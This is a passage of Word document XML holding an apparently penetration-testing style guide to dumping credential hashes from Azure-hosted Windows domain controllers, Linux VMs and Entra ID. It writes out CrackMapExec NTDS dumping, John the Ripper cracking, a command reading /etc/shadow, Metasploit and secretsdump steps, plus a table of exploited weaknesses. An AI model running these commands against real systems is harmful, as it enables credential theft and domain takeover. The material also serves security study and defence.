          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>CME is a powerful AD enumeration and post-exploitation tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365CF907" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>target_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt; -u 'Administrator' -p 'Password123' --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>drsuapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27CA5CBC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>This uses the DRSUAPI protocol to remotely dump NTDS hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19544DF3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Requires valid domain credentials with sufficient privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F18DA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="41626D6A">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9382A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6: Crack Extracted Hashes with John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC7C59" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Save dumped hashes to file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B3B0C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>cat hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32351799" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Crack using John:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D71310" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>john --format=NT hashes.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03156C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Quickly recovers plaintext passwords from NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10598417" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="780C538C">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D0E24" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Linux VMs — Local Account Hash Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C84663A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Dump /etc/shadow file (root privileges needed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E528F2B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>sudo cat /etc/shadow &gt; shadow_dump.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B4522" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Transfer to attacker machine and crack with John or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7DB07" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="0BEE0C1C">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A85CB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Microsoft Entra ID (Azure AD) Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B9456" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">No direct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> file; cloud-managed identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB68E0C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:lastRenderedPageBreak/>
        <w:t>Focus on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F741DEE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token harvesting</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> from Azure AD joined machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ACF673" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Exploit weak </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>app registrations</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delegated permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A775C17" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Use tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AzureADPwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSOLSpray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> for token abuse and enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014AEAD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> sync server compromises to harvest on-prem credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E1843" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="46535787">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44758E04" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure VM Vulnerabilities Exploited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22"/>
        <w:gridCol w:w="7078"/>
      </w:tblGrid>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="0110022E" w14:textId="77777777" w:rsidTr="0039559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D61AD3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability / Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CCFF5A7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="460F40E6" w14:textId="77777777" w:rsidTr="003955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305196" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Elevated privileges on VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB6CE24" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Needed to access NTDS or sensitive files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="2B09F6FF" w14:textId="77777777" w:rsidTr="003955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39A147" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Lack of disk/file encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07ED05F3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDS and SYSTEM files can be copied if not encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="2FC323AD" w14:textId="77777777" w:rsidTr="003955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55658F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Misconfigured SMB/WinRM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F25FF62" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve">Enables remote hash dumping with tools like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>secretsdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> or CME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="2AF7BA16" w14:textId="77777777" w:rsidTr="003955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3C6BDA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Weak domain admin credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65027963" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Enables dumping via DRSUAPI or SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="4C375D49" w14:textId="77777777" w:rsidTr="003955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AA9FC7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Poorly monitored AD environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38C08191" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Lack of alerting on file accesses or suspicious activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="6940FC6E" w14:textId="77777777" w:rsidTr="003955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02898C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Azure AD app misconfigurations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1363730A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Excessive delegated permissions enable token abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D2108D6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="0651A938">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CE3C3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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5"/>
        <w:gridCol w:w="5410"/>
        <w:gridCol w:w="1313"/>
        <w:gridCol w:w="1952"/>
      </w:tblGrid>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="4E28DD4F" w14:textId="77777777" w:rsidTr="0039559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9AB0F1" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs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6682E630" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command/Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46C5BB12" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA67024" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="61904D8C" w14:textId="77777777" w:rsidTr="003955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BEFD70" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Locate &amp; dump NTDS with Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0D6E15" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>post/windows/gather/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds_grabber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044DE8A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D1A35D7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve">CAB file with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> + hives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="10E20FAC" w14:textId="77777777" w:rsidTr="003955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FBE8E5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Extract NTDS from CAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16228EC2" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>cabextract</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> &lt;file.cab&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46CB5BCD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="028DB193" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Extracted NTDS and SYSTEM files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="5663D8D3" w14:textId="77777777" w:rsidTr="003955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8006F6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Offline hash extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0997F52B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>secretsdump.py -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
